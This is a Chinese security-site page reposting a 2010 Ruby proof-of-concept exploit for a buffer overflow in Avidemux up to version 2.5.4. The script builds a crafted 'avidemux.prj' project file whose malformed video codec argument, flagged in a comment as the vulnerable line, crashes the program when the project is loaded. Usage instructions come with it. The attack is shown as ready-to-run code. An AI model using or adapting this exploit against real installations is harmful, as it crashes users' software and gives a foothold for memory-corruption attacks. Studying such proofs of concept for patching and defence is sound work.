首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Avidemux <= 2.5.4 Buffer Overflow Vulnerability
来源:http://group51.org 作者:the_unknown 发布时间:2010-11-08  

#!/usr/bin/env ruby
# avidemux_crash.rb
#
# Title  : Avidemux <= 2.5.4 Buffer Overflow PoC
# Date  : 31.10.2010
# Version :  <= 2.5.4
# Software Link :  http://avidemux.sourceforge.net/download.html / http://avidemux.razorbyte.com.au/
# Author : The_UnKn@wn
# Email  :  the_unknown [at] group51 [dot] org
# Homepage :  http://group51.org
# Tested on : openSUSE 11.3 and Windows XP SP3 English
#
# Usage:
#  ruby avidemux_crash.rb <a *.mpg file>
#  Start Avidemux --> Load/Run Project --> crash!!
#
# Note:
#  You can also use another video file format you would have to change the Format in Line and maybe some other stuff #54 too
#

file = ARGV[0]

if file.nil?
 puts "Usage: ruby #{__FILE__} <path to sample video .mpg file>"
 exit
end
name = "avidemux.prj"

text = "//AD  <- Needed to identify//\n" +
"//--automatically built--\n"+
"var app = new Avidemux();\n"+
"//** Video **\n"+
"// 01 videos source \n"+
"app.load(\"#{file}\");\n"+
"//01 segments:\n"+
"app.clearSegments();\n"+
"app.addSegment(0,0,157699);\n"+
"app.markerA=0;\n"+
"app.markerB=77543;\n"+
"app.rebuildIndex();\n"+
"//** Postproc **\n"+
"app.video.setPostProc(3,3,0);\n"+
"app.video.fps1000 = 25000;\n"+
"//** Filters **\n"+
"//** Video Codec conf **\n"+
"app.video.codec(\"Copy\", \"CQ=4\", \"200 \"); \n"+ # <-- here is the vuln app.video.codec("Copy","CQ=4","0 ");
"//** Audio **\n"+
"app.audio.reset();\n"+
"app.audio.codec(\"copy\",-1078515528,0,\"\");\n"+
"app.audio.normalizeMode=0;\n"+
"app.audio.normalizeValue=0;\n"+
"app.audio.delay=0;\n"+
"app.audio.mixer=\"NONE\";\n"+
"app.setContainer(\"AVI\");\n"+
"setSuccess(1);\n"+
"//app.Exit();\n"+
"//End of script"

File.open(name, "w") do |f|
 f.puts(text)
end

puts "File #{name} has been created successfully"


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·WinTFTP Server Pro v3.1 (0day)
·FileFuzz Denial of service vul
·Sami HTTP Server 2.0.1 GET Req
·PHP 5.3.3/5.2.14 ZipArchive::g
·Internet Explorer 6, 7, 8 Memo
·LEADTOOLS v11.5.0.9 ltisi11n.o
·Avast! Internet Security aswtd
·LEADTOOLS v11.5.0.9 ltlst11n.o
·Internet Explorer Memory Corru
·LEADTOOLS v11.5.0.9 ltdlg11n.o
·CA BrightStor ARCserve for Lap
·LEADTOOLS v11.5.0.9 lttmb11n.o
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved